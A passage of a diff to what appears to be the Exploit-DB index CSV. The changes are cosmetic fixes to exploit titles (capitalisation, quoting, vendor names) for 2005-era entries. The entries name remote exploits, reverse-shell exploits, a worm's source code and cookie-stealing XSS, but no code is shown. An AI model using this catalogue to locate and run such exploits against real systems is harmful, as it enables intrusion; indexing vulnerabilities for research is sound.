Disclosure",2005-02-08,Kozan,windows,local,0 -799,platforms/osx/dos/799.c,"Mac OSX - AppleFileServer Remote Denial of Service",2005-02-08,nemo,osx,dos,0 +799,platforms/osx/dos/799.c,"Apple Mac OS X - AppleFileServer Remote Denial of Service",2005-02-08,nemo,osx,dos,0 800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module - Remote Exploit",2005-02-08,"ALBANIA SECURITY",php,webapps,0 801,platforms/php/webapps/801.c,"PHP-Nuke 7.4 - Admin Exploit",2005-02-09,Silentium,php,webapps,0 -802,platforms/windows/remote/802.cpp,"MSN Messenger - .png Image Buffer Overflow Download Shellcode Exploit",2005-02-09,ATmaCA,windows,remote,0 +802,platforms/windows/remote/802.cpp,"MSN Messenger - '.png' Image Buffer Overflow Download Shellcode Exploit",2005-02-09,ATmaCA,windows,remote,0 803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0 -804,platforms/windows/remote/804.c,"MSN Messenger (Linux) - .png Image Buffer Overflow",2005-02-09,dgr,windows,remote,0 +804,platforms/windows/remote/804.c,"MSN Messenger (Linux) - '.png' Image Buffer Overflow",2005-02-09,dgr,windows,remote,0 805,platforms/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell Exploit",2005-02-09,n4rk0tix,multiple,remote,8080 806,platforms/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String Exploit",2005-02-09,"Serkan Akpolat",linux,remote,8080 807,platforms/php/webapps/807.txt,"MyPHP Forum 1.0 - SQL Injection",2005-02-10,GHC,php,webapps,0 @@ -638,7 +638,7 @@ id,file,description,date,author,platform,type,port 812,platforms/linux/remote/812.c,"Exim 4.43 - 'auth_spa_server()' Remote Exploit (PoC)",2005-02-12,"Yuri Gushin",linux,remote,25 813,platforms/windows/dos/813.c,"Quake 3 Engine - Infostring Crash and Shutdown Exploit",2005-02-12,"Luigi Auriemma",windows,dos,0 814,platforms/php/webapps/814.txt,"MercuryBoard 1.1.1 - SQL Injection",2005-02-12,Zeelock,php,webapps,0 -815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup - Remote Buffer Overlow (PoC)",2005-02-12,cybertronic,linux,dos,0 +815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup - Remote Buffer Overflow (PoC)",2005-02-12,cybertronic,linux,dos,0 816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0 817,platforms/cgi/dos/817.pl,"AWStats 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0 818,platforms/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0 @@ -672,11 +672,11 @@ id,file,description,date,author,platform,type,port 847,platforms/windows/remote/847.cpp,"BadBlue 2.55 - Web Server Remote Buffer Overflow",2005-02-27,tarako,windows,remote,80 848,platforms/windows/local/848.asm,"Einstein 1.01 - Local Password Disclosure Exploit (asm)",2005-02-28,illwill,windows,local,0 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0 -852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - .png Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0 +852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0 853,platforms/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit (extra)",2005-03-02,omin0us,cgi,webapps,0 854,platforms/windows/remote/854.cpp,"Foxmail 1.1.0.1 - POP3 Temp Dir Stack Overflow",2005-03-02,Swan,windows,remote,110 855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 -856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - (Bluetooth Nickname) Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 +856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - (BlueTooth Nickname) Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 857,platforms/php/webapps/857.txt,"PHP Form Mail 2.3 - Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",php,webapps,0 858,platforms/php/webapps/858.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0 859,platforms/windows/remote/859.c,"CA License Server - (GETCONFIG) Remote Buffer Overflow",2005-03-06,class101,windows,remote,10203 @@ -689,7 +689,7 @@ id,file,description,date,author,platform,type,port 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection",2005-03-08,Silentium,php,webapps,0 867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 -869,platforms/bsd/dos/869.c,"OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service",2005-03-09,RusH,bsd,dos,0 +869,platforms/bsd/dos/869.c,"OpenBSD 2.0 - 3.6 TCP Timestamp Remote Denial of Service",2005-03-09,RusH,bsd,dos,0 870,platforms/php/webapps/870.txt,"Download Center Lite (DCL) 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps,0 871,platforms/php/webapps/871.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 872,platforms/php/webapps/872.pl,"SocialMPN - Arbitrary File Injection",2005-03-11,y3dips,php,webapps,0 @@ -715,7 +715,7 @@ id,file,description,date,author,platform,type,port 892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service",2005-03-21,"GSS IT",windows,dos,0 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Privilege Escalation (3)",2005-03-22,sd,linux,local,0 -896,platforms/osx/local/896.c,"Mac OSX 10.3.8 - (CF_CHARSET_PATH) Buffer Overflow Privilege Escalation",2005-03-22,vade79,osx,local,0 +896,platforms/osx/local/896.c,"Apple Mac OS X 10.3.8 - 'CF_CHARSET_PATH' Buffer Overflow Privilege Escalation",2005-03-22,vade79,osx,local,0 897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0 898,platforms/aix/local/898.sh,"AIX 5.3.0 - (invscout) Local Command Execution",2005-03-25,ri0t,aix,local,0 899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server 0.4.2 - Denial of Service",2005-03-28,GreenwooD,windows,dos,0 @@ -728,7 +728,7 @@ id,file,description,date,author,platform,type,port 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0 908,platforms/windows/dos/908.c,"ArGoSoft FTP Server 1.4.2.8 - Denial of Service",2005-04-03,c0d3r,windows,dos,0 -909,platforms/windows/remote/909.cpp,"Microsoft Windows - (WINS) Remote Buffer Overflow (3)",2005-04-12,class101,windows,remote,42 +909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (3)",2005-04-12,class101,windows,remote,42 910,platforms/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Remote Exploit",2005-04-04,CereBrums,php,webapps,0 911,platforms/linux/dos/911.c,"Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service",2005-04-04,"Daniel McNeil",linux,dos,0 912,platforms/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Local Exploit",2005-04-04,Kozan,windows,local,0 @@ -744,8 +744,8 @@ id,file,description,date,author,platform,type,port 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0 924,platforms/linux/local/924.c,"sash 3.7 - Local Buffer Overflow",2005-04-08,lammat,linux,local,0 -925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass SQL Injection",2005-04-09,LaMeR,asp,webapps,0 -926,platforms/linux/local/926.c,"Linux Kernel 2.4.x / 2.6.x - 'Bluez' Bluetooth Signed Buffer Index Privilege Escalation (3)",2005-10-26,qobaiashi,linux,local,0 +925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0 +926,platforms/linux/local/926.c,"Linux Kernel 2.4.x / 2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (3)",2005-10-26,qobaiashi,linux,local,0 927,platforms/windows/local/927.c,"Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow",2005-04-11,"Stuart Pearson",windows,local,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - (change_email) SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0 929,platforms/windows/local/929.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (1)",2005-04-12,"Tal Zeltzer",windows,local,0 @@ -757,16 +757,16 @@ id,file,description,date,author,platform,type,port 935,platforms/windows/local/935.c,"Morpheus 4.8 - Local Chat Passwords Disclosure Exploit",2005-04-13,Kozan,windows,local,0 936,platforms/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 937,platforms/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 -938,platforms/windows/local/938.cpp,"Microsoft Windows - (HTA) Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0 +938,platforms/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0 939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0 940,platforms/linux/remote/940.c,"Sumus 0.2.2 - httpd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service",2005-04-14,"Luigi Auriemma",windows,dos,0 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 -943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution Exploit",2005-04-18,"Michael Krax",windows,remote,0 +943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",windows,remote,0 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - (GET Request) Remote Buffer Overflow Exploit",2005-04-24,cybertronic,windows,remote,80 946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot Denial of Service",2005-04-19,ChoiX,multiple,dos,0 -947,platforms/windows/remote/947.pl,"Microsoft Exchange Server - Remote Code Execution Exploit (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 +947,platforms/windows/remote/947.pl,"Microsoft Exchange Server - Remote Code Execution (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service",2005-04-20,houseofdabus,multiple,dos,0 949,platforms/windows/remote/949.c,"PMsoftware Simple Web Server 1.0 - Remote Stack Overflow",2005-04-20,c0d3r,windows,remote,80 950,platforms/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow",2005-04-21,sk,linux,local,0 @@ -802,7 +802,7 @@ id,file,description,date,author,platform,type,port 982,platforms/php/webapps/982.c,"ZeroBoard Worm - Source Code",2005-05-06,anonymous,php,webapps,0 983,platforms/windows/dos/983.cpp,"DataTrac Activity Console - Denial of Service",2005-05-06,basher13,windows,dos,0 984,platforms/multiple/dos/984.c,"Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service",2005-05-07,Nicob,multiple,dos,0 -986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0 +986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Arbitrary Code Execution",2005-05-07,"Edward Gagnon",windows,remote,0 987,platforms/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,windows,remote,0 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,windows,dos,0 989,platforms/php/webapps/989.pl,"PhotoPost - Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0 @@ -817,25 +817,25 @@ id,file,description,date,author,platform,type,port 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2)",2005-05-20,Nikyt0x,cgi,webapps,0 1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - register.php SQL Injection",2005-05-20,deluxe89,php,webapps,0 -1007,platforms/multiple/remote/1007.html,"Mozilla Firefox - view-source:javascript url Code Execution Exploit",2005-05-21,mikx,multiple,remote,0 +1007,platforms/multiple/remote/1007.html,"Mozilla Firefox - view-source:JavaScript url Code Execution",2005-05-21,mikx,multiple,remote,0 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0 1009,platforms/linux/local/1009.c,"Exim 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0 -1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - password.asp Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 -1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - password.asp Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0 -1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - password.asp Change Password Exploit (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0 +1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - Password.asp Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 +1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - Password.asp Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0 +1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - Password.asp Change Password Exploit (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0 1013,platforms/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",php,webapps,0 1014,platforms/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 1015,platforms/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",asp,webapps,0 -1016,platforms/php/webapps/1016.pl,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 -1017,platforms/php/webapps/1017.php,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 -1018,platforms/php/webapps/1018.php,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2)",2005-05-30,Nikyt0x,php,webapps,0 +1016,platforms/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass Exploit (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 +1017,platforms/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass Exploit (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 +1018,platforms/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass Exploit (PHP) (2)",2005-05-30,Nikyt0x,php,webapps,0 1019,platforms/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local Exploit (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0 -1020,platforms/php/webapps/1020.c,"Zeroboard 4.1 - preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0 +1020,platforms/php/webapps/1020.c,"ZeroBoard 4.1 - preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0 1021,platforms/linux/remote/1021.c,"Ethereal 0.10.10 - (SIP) Protocol Dissector Remote Buffer Overflow Exploit",2005-05-31,"Team W00dp3ck3r",linux,remote,0 1022,platforms/php/webapps/1022.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'calendar.php' SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 -1023,platforms/php/webapps/1023.pl,"myBloggie 2.1.1 < 2.1.2 - SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 +1023,platforms/php/webapps/1023.pl,"MyBloggie 2.1.1 < 2.1.2 - SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0 -1025,platforms/windows/dos/1025.html,"Microsoft Internet Explorer - javascript 'window()' Crash",2005-05-31,"Benjamin Franz",windows,dos,0 +1025,platforms/windows/dos/1025.html,"Microsoft Internet Explorer - JavaScript 'window()' Crash",2005-05-31,"Benjamin Franz",windows,dos,0 1026,platforms/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 - (imap) Remote Buffer Overflow",2005-06-02,"Jerome Athias",windows,remote,143 1027,platforms/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service",2005-06-02,ATmaCA,windows,dos,0 1028,platforms/windows/remote/1028.c,"Crob FTP Server 3.6.1 - Remote Stack Overflow",2005-06-03,"Leon Juranic",windows,remote,0 @@ -843,7 +843,7 @@ id,file,description,date,author,platform,type,port 1030,platforms/php/webapps/1030.pl,"PostNuke 0.750 - readpmsg.php SQL Injection",2005-06-05,K-C0d3r,php,webapps,0 1031,platforms/php/webapps/1031.pl,"Portail PHP < 1.3 - SQL Injection",2005-06-06,"Alberto Trivero",php,webapps,0 1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Privilege Escalation",2005-06-07,"Ilya Rabinovich",windows,local,0 -1033,platforms/php/webapps/1033.pl,"Wordpress 1.5.1.1 - SQL Injection",2005-06-22,"Alberto Trivero",php,webapps,0 +1033,platforms/php/webapps/1033.pl,"WordPress 1.5.1.1 - SQL Injection",2005-06-22,"Alberto Trivero",php,webapps,0 1034,platforms/windows/local/1034.cpp,"WinZip 8.1 - Command Line Local Buffer Overflow",2005-06-07,ATmaCA,windows,local,0 1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 1036,platforms/php/webapps/1036.php,"Invision Power Board 1.3.1 - 'login.php' SQL Injection",2005-06-08,anonymous,php,webapps,0 @@ -852,7 +852,7 @@ id,file,description,date,author,platform,type,port 1039,platforms/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution Exploit (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1040,platforms/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution Exploit (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1041,platforms/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution Exploit (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 -1043,platforms/osx/local/1043.c,"Mac OSX 10.4 - launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0 +1043,platforms/osx/local/1043.c,"Apple Mac OS X 10.4 - launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0 1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1046,platforms/aix/local/1046.c,"AIX 5.2 - 'paginit' Privilege Escalation",2005-06-14,intropy,aix,local,0 @@ -861,19 +861,19 @@ id,file,description,date,author,platform,type,port 1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash Remote Exploit",2005-06-15,pokleyzz,php,webapps,0 1050,platforms/php/webapps/1050.pl,"PHP Arena 1.1.3 - pafiledb.php Remote Change Password Exploit",2005-06-15,Alpha_Programmer,php,webapps,0 1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 -1052,platforms/php/webapps/1052.php,"Claroline e-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,php,webapps,0 -1053,platforms/php/webapps/1053.pl,"Claroline e-Learning 1.6 - Remote Hash SQL Injection (2)",2005-06-19,K-C0d3r,php,webapps,0 +1052,platforms/php/webapps/1052.php,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,php,webapps,0 +1053,platforms/php/webapps/1053.pl,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)",2005-06-19,K-C0d3r,php,webapps,0 1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String Exploit",2005-06-20,darkeagle,linux,remote,7144 1056,platforms/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 1057,platforms/php/webapps/1057.pl,"Simple Machines Forum 1.0.4 - (modify) SQL Injection",2005-06-21,"James Bercegay",php,webapps,0 1058,platforms/php/webapps/1058.pl,"MercuryBoard 1.1.4 - SQL Injection",2005-06-21,RusH,php,webapps,0 -1059,platforms/php/webapps/1059.pl,"Wordpress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,php,webapps,0 +1059,platforms/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,php,webapps,0 1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 - Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0 1061,platforms/php/webapps/1061.pl,"Mambo 4.5.2.1 - SQL Injection",2005-06-21,RusH,php,webapps,0 1062,platforms/php/webapps/1062.pl,"Cacti 0.8.6d - Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 1063,platforms/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users Denial of Service (Perl)",2005-06-22,g30rg3_x,php,dos,0 1064,platforms/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users Denial of Service (C)",2005-06-22,HaCkZaTaN,php,dos,0 -1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0 +1065,platforms/windows/dos/1065.c,"Microsoft Windows - 'SMB' Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)",2005-06-24,eyas,windows,remote,0 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service",2005-06-25,basher13,windows,dos,0 1068,platforms/php/webapps/1068.pl,"PHP-Fusion 6.00.105 - Accessible Database Backups Download Exploit",2005-06-25,Easyex,php,webapps,0 @@ -885,7 +885,7 @@ id,file,description,date,author,platform,type,port 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Privilege Escalation (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 -1077,platforms/php/webapps/1077.pl,"Wordpress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 +1077,platforms/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - (xmlrpc.php) Remote Code Injection",2005-07-01,ilo--,php,webapps,0 1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 @@ -909,10 +909,10 @@ id,file,description,date,author,platform,type,port 1099,platforms/windows/remote/1099.pl,"Baby Web Server 2.6.2 - Command Validation Exploit",2005-07-11,basher13,windows,remote,0 1100,platforms/windows/dos/1100.pl,"Remote File Explorer 1.0 - Denial of Service",2005-07-11,basher13,windows,dos,0 1101,platforms/windows/dos/1101.c,"wMailServer 1.0 - Remote Denial of Service",2005-07-12,Kozan,windows,dos,0 -1102,platforms/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution Exploit",2005-07-13,"Michael Krax",windows,remote,0 +1102,platforms/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution",2005-07-13,"Michael Krax",windows,remote,0 1103,platforms/php/webapps/1103.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 1104,platforms/windows/dos/1104.cpp,"Microsoft Windows - Netman Service Local Denial of Service",2005-07-14,bkbll,windows,dos,0 -1105,platforms/windows/dos/1105.c,"NetPanzer 0.8 - Remote Denial of Service",2005-07-14,"Luigi Auriemma",windows,dos,0 +1105,platforms/windows/dos/1105.c,"netPanzer 0.8 - Remote Denial of Service",2005-07-14,"Luigi Auriemma",windows,dos,0 1106,platforms/php/webapps/1106.txt,"e107 0.617 - Cross-Site Scripting Remote Cookie Disclosure Exploit",2005-07-14,warlord,php,webapps,0 1107,platforms/windows/dos/1107.pl,"Remote Control Server 1.6.2 - Denial of Service",2005-07-15,basher13,windows,dos,0 1108,platforms/windows/remote/1108.pl,"Small HTTP Server 3.05.28 - Arbitrary Data Execution Exploit",2005-07-15,basher13,windows,remote,0 @@ -920,7 +920,7 @@ id,file,description,date,author,platform,type,port 1110,platforms/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)",2005-07-15,"Edward Gagnon",windows,dos,0 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection",2005-07-18,RusH,php,webapps,0 1112,platforms/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 -1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit)",2005-07-19,str0ke,php,webapps,0 +1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution (Metasploit)",2005-07-19,str0ke,php,webapps,0 1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II - Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,windows,remote,0 1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (1)",2005-07-21,snooq,windows,dos,0 @@ -937,17 +937,17 @@ id,file,description,date,author,platform,type,port 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Exploiter Tool",2005-08-03,cybertronic,windows,remote,6070 -1133,platforms/php/webapps/1133.pm,"vBulletin 3.0.6 - (Template) Command Execution Exploit (Metasploit)",2005-08-03,str0ke,php,webapps,0 +1133,platforms/php/webapps/1133.pm,"vBulletin 3.0.6 - 'template' Command Execution Exploit (Metasploit)",2005-08-03,str0ke,php,webapps,0 1134,platforms/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - 'login.php' SQL Injection",2005-08-05,"James Bercegay",php,webapps,0 1135,platforms/php/webapps/1135.c,"PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection",2005-08-05,Easyex,php,webapps,0 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of 